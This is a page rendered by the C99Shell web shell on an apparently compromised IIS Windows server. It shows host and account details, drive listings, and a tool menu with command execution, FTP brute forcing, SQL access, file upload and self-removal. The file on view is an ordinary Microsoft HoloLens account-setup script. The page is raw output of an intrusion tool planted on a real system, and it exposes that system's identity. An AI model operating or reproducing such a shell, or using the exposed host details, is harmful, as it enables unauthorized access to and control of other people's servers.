!C99Shell v. 2.1 [PHP 8 Update] [02.02.2022]!

Software: Microsoft-IIS/10.0. PHP/7.4.33 

uname -a: Windows NT LAKE 10.0 build 20348 (Windows Server 2016) AMD64 

IWPD_801(traduongco) 

Safe-mode: OFF (not secure)

C:\Windows\SystemApps\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\js\   drwxrwxrwx
Free 21.01 GB of 99.4 GB (21.14%)
Detected drives: [ a ] [ c ] [ d ] [ e ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     hololensWorkAccount.js (2.41 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |


"use strict";
var CloudExperienceHost;
(function (CloudExperienceHost) {
    var HoloLensAccount;
    (function (HoloLensAccount) {
        function createWorkAccount(username, password) {
            return new WinJS.Promise(function (completeDispatch, errorDispatch, progressDispatch) {
                var provider = new Windows.Security.Cryptography.DataProtection.DataProtectionProvider("local=user");
                var buffer = Windows.Security.Cryptography.CryptographicBuffer.convertStringToBinary(password, Windows.Security.Cryptography.BinaryStringEncoding.utf8);

                provider.protectAsync(buffer).then(function (protectedBuffer) {
                    var encodedString = Windows.Security.Cryptography.CryptographicBuffer.encodeToBase64String(protectedBuffer);

                    var propertySet = CloudExperienceHost.Storage.PrivateData.getValues();
                    propertySet['tokenUpn'] = username;
                    propertySet['oobe-password'] = encodedString;
                    propertySet['configureSignIn'] = 'once';

                    var cloudDomainJoinWorker = new CloudDomainJoin.DataModel.CloudDomainJoinWorker();
                    return cloudDomainJoinWorker.prepareAzureADAccountAsync(propertySet);
                }).done(
                    function () { completeDispatch(); },
                    function (err) { errorDispatch(err); },
                    function (progress) { progressDispatch(progress); });
            });
        }
        HoloLensAccount.createWorkAccount = createWorkAccount;

        
        function localizedStrings() {
            var hololensAccountResources = {};
            var keyList = ['Title', 'LeadText', 'UserPlaceholder', 'PasswordTitle', 'PasswordPlaceholder', 'Error_NoUsername', 'Error_UserExists', 'Error_UsernameFormat', 'Error_Creating_Account_Warning', 'BackButton', 'NextButton'];
            var i = 0;
            for (i = 0; i < keyList.length; i++) {
                var resourceId = '/hololensAccount/' + keyList[i];
                hololensAccountResources[keyList[i]] = WinJS.Resources.getString(resourceId).value;
            }
            return JSON.stringify(hololensAccountResources);
        }
        HoloLensAccount.localizedStrings = localizedStrings;
    })(CloudExperienceHost.HoloLensAccount || (CloudExperienceHost.HoloLensAccount = {}));
})(CloudExperienceHost || (CloudExperienceHost = {}));

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.1 [PHP 8 Update] [02.02.2022] maintained byC99Shell Github | Generation time: 0.6179 ]--